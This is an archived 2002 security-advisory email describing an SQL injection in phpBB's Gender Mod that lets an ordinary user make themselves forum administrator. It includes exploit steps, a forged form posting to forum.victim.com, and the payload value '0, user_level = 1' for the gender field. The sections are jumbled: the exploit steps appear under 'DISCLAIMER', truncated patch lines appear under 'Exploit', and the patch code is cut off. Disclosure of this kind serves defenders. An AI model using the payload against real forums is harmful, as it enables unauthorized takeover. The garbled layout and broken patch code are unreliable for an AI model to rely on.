[UNIX] phpBB's Gender Mod Allows Gaining Administrative Privileges
From: support@securiteam.comDate: 07/29/02
- Previous message: support@securiteam.com: "[NEWS] HP ProCurve Switch Denial of Service Attack"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Mon, 29 Jul 2002 07:37:29 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
phpBB's Gender Mod Allows Gaining Administrative Privileges
------------------------------------------------------------------------
SUMMARY
In phpBB with the official
<http://www.phpbb.com/mods/downloads/index.php?t=sub_pages&cat=6> Gender
Mod, there is a vulnerability that allows a normal user set her/himself to
become a forum administrator.
DETAILS
Vulnerable systems:
* Gender Mod version 1.1.3
Gender Mod is a commonly used modification in official phpBB releases.
Unchecked posted values can add some SQL fields into the UPDATE SQL
command. By assigning the value: 'user_level = 1', a remote attacker can
gain administrative privileges to the forum.
Exploit:
Patch:
#
$gender = ( isset($HTTP_POST_VARS['gender']) ) ? $HTTP_POST_VARS
#
$gender = ( isset($HTTP_POST_VARS['gender']) ) ? intval
#
ADDITIONAL INFORMATION
The information has been provided by <mailto:trungonly@yahoo.com>
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
1. Save the User Profile page into your disk to modify it offline.
2. Add the correct full post action address (http://forum.victim.com/...):
< FORM action=http://forum.victim.com/profile.php?sid=
method=post encType=multipart/form-data>
3. Modify the HTML Form so that the input field "gender" has value like:
< input type=text name=gender value="0, user_level = 1 ">
4. Load this page in the same browser window where the cookie is still
available.
File to patch, forumroot/includes/usercp_register.php:
# Patch
#
#-----[ OPEN ]------------------------------------------
#
forumroot/includes/usercp_register.php
#-----[ FIND ]------------------------------------------
#
['gender'] : 0;
#-----[ REPLACE AS ]------------------------------------
#
($HTTP_POST_VARS['gender']) : 0;
#-----[ SAVE/CLOSE/UPLOAD THIS FILE ]-------------------
#
# EoP
langtuhaohoa caothuvolam.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... ## Gender Mod is a commonly used modification in official phpBB releases. ... Modify the HTML Form so that the input field "gender" has value like: ... ## File To Patch: ...
(Bugtraq)
... Microsoft has released a patch for: ... ActiveX Component vulnerability, the following is an exploit code for that ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
... The Pine email client allows users to define the "From:" address ... Applying the following patch to pine 4.4 will cause Sender: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
... Subject: OpenSSH Snoop Patch ... Common subdirectories: old/openbsd-compat and new/openbsd-compat ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
... It is possible to cause <http://www.snort.org/> Snort, ... Snort version 1.8 and prior (without the patch) ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
